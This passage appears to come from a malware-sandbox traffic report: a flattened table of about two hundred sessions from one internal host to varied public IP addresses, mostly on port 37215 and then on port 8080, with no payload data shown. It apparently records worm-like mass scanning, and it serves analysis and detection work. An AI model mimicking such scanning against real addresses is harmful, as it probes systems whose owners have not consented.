                                                        14466192.168.2.2355306197.154.65.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14467192.168.2.234141641.83.88.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14468192.168.2.234759641.178.241.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14469192.168.2.2346292157.15.102.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14470192.168.2.233699819.56.41.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14471192.168.2.2342650197.187.221.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14472192.168.2.235706249.228.31.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14473192.168.2.2348048149.221.61.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14474192.168.2.2351508170.138.59.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14475192.168.2.2360604197.230.208.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14476192.168.2.235473441.136.218.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14477192.168.2.234672435.186.62.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14478192.168.2.2334846197.99.221.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14479192.168.2.2338580197.193.165.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14480192.168.2.2348398197.84.40.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14481192.168.2.2356200197.223.223.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14482192.168.2.2346348177.209.156.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14483192.168.2.2345366157.127.25.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14484192.168.2.2360098157.181.141.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14485192.168.2.235359641.202.110.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14486192.168.2.234599259.32.166.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14487192.168.2.2344718157.122.20.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14488192.168.2.233602241.56.32.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14489192.168.2.2343066157.252.12.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14490192.168.2.235415470.236.157.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14491192.168.2.235684641.155.156.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14492192.168.2.234887241.46.246.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14493192.168.2.235451841.1.28.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14494192.168.2.234703482.194.158.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14495192.168.2.233442841.166.117.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14496192.168.2.2334236111.100.163.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14497192.168.2.2333114197.133.147.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14498192.168.2.2352950197.70.220.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14499192.168.2.235826020.95.229.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14500192.168.2.2341818157.49.18.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14501192.168.2.235326486.253.8.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14502192.168.2.2343238197.46.197.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14503192.168.2.2341164197.240.222.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14504192.168.2.2338764197.197.216.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14505192.168.2.2341878197.207.182.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14506192.168.2.234540641.135.66.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14507192.168.2.2338734157.231.77.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14508192.168.2.234442041.151.190.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14509192.168.2.2343718197.7.99.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14510192.168.2.235899498.28.189.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14511192.168.2.233978260.150.74.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14512192.168.2.2333372157.21.88.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14513192.168.2.236077641.160.21.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14514192.168.2.2359700197.0.186.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14515192.168.2.2347730213.198.56.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14516192.168.2.2355814197.128.63.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14517192.168.2.2347196157.170.236.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14518192.168.2.235092041.53.80.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14519192.168.2.2340732198.198.167.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14520192.168.2.235196834.136.203.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14521192.168.2.235941641.46.33.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14522192.168.2.2354476157.153.225.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14523192.168.2.2334806197.143.86.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14524192.168.2.2336204197.195.78.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14525192.168.2.235181041.172.33.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14526192.168.2.2340442197.128.200.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14527192.168.2.23329689.181.60.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14528192.168.2.2358096157.66.96.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14529192.168.2.2348294197.175.121.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14530192.168.2.2354362197.187.90.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14531192.168.2.2357042197.100.115.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14532192.168.2.2356846157.121.85.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14533192.168.2.2354102157.61.14.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14534192.168.2.2342814182.80.85.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14535192.168.2.234270641.236.198.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14536192.168.2.2358848157.16.77.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14537192.168.2.235955241.209.186.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14538192.168.2.2341334210.247.164.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14539192.168.2.2344728157.163.196.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14540192.168.2.2347750116.135.18.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14541192.168.2.2349660197.26.215.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14542192.168.2.2358360114.60.34.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14543192.168.2.2356120197.175.251.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14544192.168.2.233422662.2.217.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14545192.168.2.2353578197.216.231.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14546192.168.2.233672041.25.252.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14547192.168.2.233549041.53.9.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14548192.168.2.235104618.7.74.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14549192.168.2.2358412197.82.226.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14550192.168.2.234414441.202.27.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14551192.168.2.2335594197.229.113.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14552192.168.2.2337446157.3.251.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14553192.168.2.2338090199.131.239.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14554192.168.2.233729241.37.112.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14555192.168.2.2344566157.109.169.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14556192.168.2.233529239.218.17.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14557192.168.2.234822267.124.248.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14558192.168.2.2352428159.67.91.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14559192.168.2.2350836157.55.15.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14560192.168.2.233395470.117.250.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14561192.168.2.2346894134.252.77.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14562192.168.2.2338182197.37.253.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14563192.168.2.234865241.15.157.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14564192.168.2.234025041.144.166.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14565192.168.2.234678041.254.73.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14566192.168.2.2341840157.245.22.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14567192.168.2.2335162125.222.208.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14568192.168.2.2336948157.62.44.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14569192.168.2.235316241.71.58.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14570192.168.2.2345702157.254.183.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14571192.168.2.2342686111.148.229.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14572192.168.2.2357226172.133.36.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14573192.168.2.2342636178.90.132.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14574192.168.2.233633817.31.166.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14575192.168.2.2342610129.66.46.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14576192.168.2.234871474.188.254.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14577192.168.2.2335696211.168.178.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14578192.168.2.2357544104.123.72.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14579192.168.2.235387889.220.251.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14580192.168.2.23450801.200.241.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14581192.168.2.233668250.241.214.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14582192.168.2.233654647.159.164.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14583192.168.2.2341848112.14.236.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14584192.168.2.23540088.27.67.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14585192.168.2.235735075.150.182.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14586192.168.2.2341352134.42.103.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14587192.168.2.234654671.183.216.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14588192.168.2.235390884.192.71.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14589192.168.2.2354124135.28.13.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14590192.168.2.2333430130.160.127.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14591192.168.2.2356214147.218.145.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14592192.168.2.2350232185.58.208.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14593192.168.2.234327254.103.213.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14594192.168.2.234597458.177.14.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14595192.168.2.2346842152.89.20.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14596192.168.2.233680660.106.121.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14597192.168.2.233679482.3.133.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14598192.168.2.234248844.208.96.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14599192.168.2.233762036.223.86.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14600192.168.2.2338804222.196.15.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14601192.168.2.2353066141.231.7.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14602192.168.2.234428234.142.220.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14603192.168.2.2356920216.105.67.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14604192.168.2.2353778192.242.81.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14605192.168.2.235684070.88.214.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14606192.168.2.236027694.210.228.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14607192.168.2.23380502.44.66.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14608192.168.2.2338764189.106.3.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14609192.168.2.2352492104.154.136.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14610192.168.2.2336722166.158.234.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14611192.168.2.235434491.223.34.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14612192.168.2.23422505.245.189.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14613192.168.2.233514299.30.179.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14614192.168.2.233492225.41.30.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14615192.168.2.235417412.188.101.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14616192.168.2.2334016201.126.119.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14617192.168.2.234868423.30.203.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14618192.168.2.2342178201.71.233.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14619192.168.2.2340358111.247.142.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14620192.168.2.233387068.149.38.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14621192.168.2.234599496.140.30.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14622192.168.2.234312218.128.229.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14623192.168.2.234955612.189.170.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14624192.168.2.2352712191.5.6.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14625192.168.2.2339236182.154.21.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14626192.168.2.234166897.98.214.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14627192.168.2.2351146108.171.125.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14628192.168.2.235052812.90.88.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14629192.168.2.235411439.111.19.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14630192.168.2.234798489.97.214.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14631192.168.2.2342968164.231.96.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14632192.168.2.2354150104.62.238.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14633192.168.2.2346200213.23.216.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14634192.168.2.23565842.254.104.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14635192.168.2.2339610142.25.247.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14636192.168.2.2339796149.216.243.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14637192.168.2.233817645.163.246.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14638192.168.2.2346298172.212.136.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14639192.168.2.23578505.99.3.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14640192.168.2.2358284216.145.119.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14641192.168.2.2339610218.165.174.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14642192.168.2.235778498.46.96.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14643192.168.2.233833658.99.252.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14644192.168.2.2338658217.78.24.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14645192.168.2.2335976142.92.29.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14646192.168.2.233558067.87.119.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14647192.168.2.2343978151.235.18.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14648192.168.2.234328035.86.96.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14649192.168.2.2347418122.101.65.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14650192.168.2.233800682.36.210.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14651192.168.2.2359078103.228.61.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14652192.168.2.2333448105.37.202.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14653192.168.2.2350920198.197.228.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14654192.168.2.233494670.176.216.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14655192.168.2.2348960115.67.5.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14656192.168.2.2356806165.220.196.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14657192.168.2.2348780172.69.138.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14658192.168.2.2350700111.210.187.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14659192.168.2.2352578165.178.120.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14660192.168.2.2344466179.127.88.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14661192.168.2.234399058.225.199.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14662192.168.2.2341970148.21.205.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14663192.168.2.2337720106.9.243.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14664192.168.2.234301278.70.35.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14665192.168.2.2354634117.132.250.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14666192.168.2.235981087.172.157.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14667192.168.2.2360170222.11.207.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14668192.168.2.234426813.51.30.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14669192.168.2.2353866136.176.169.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14670192.168.2.2339428155.213.161.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14671192.168.2.234009214.173.212.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14672192.168.2.233374225.176.160.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14673192.168.2.2354218158.206.255.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14674192.168.2.2335910118.148.204.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14675192.168.2.2338452155.118.28.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
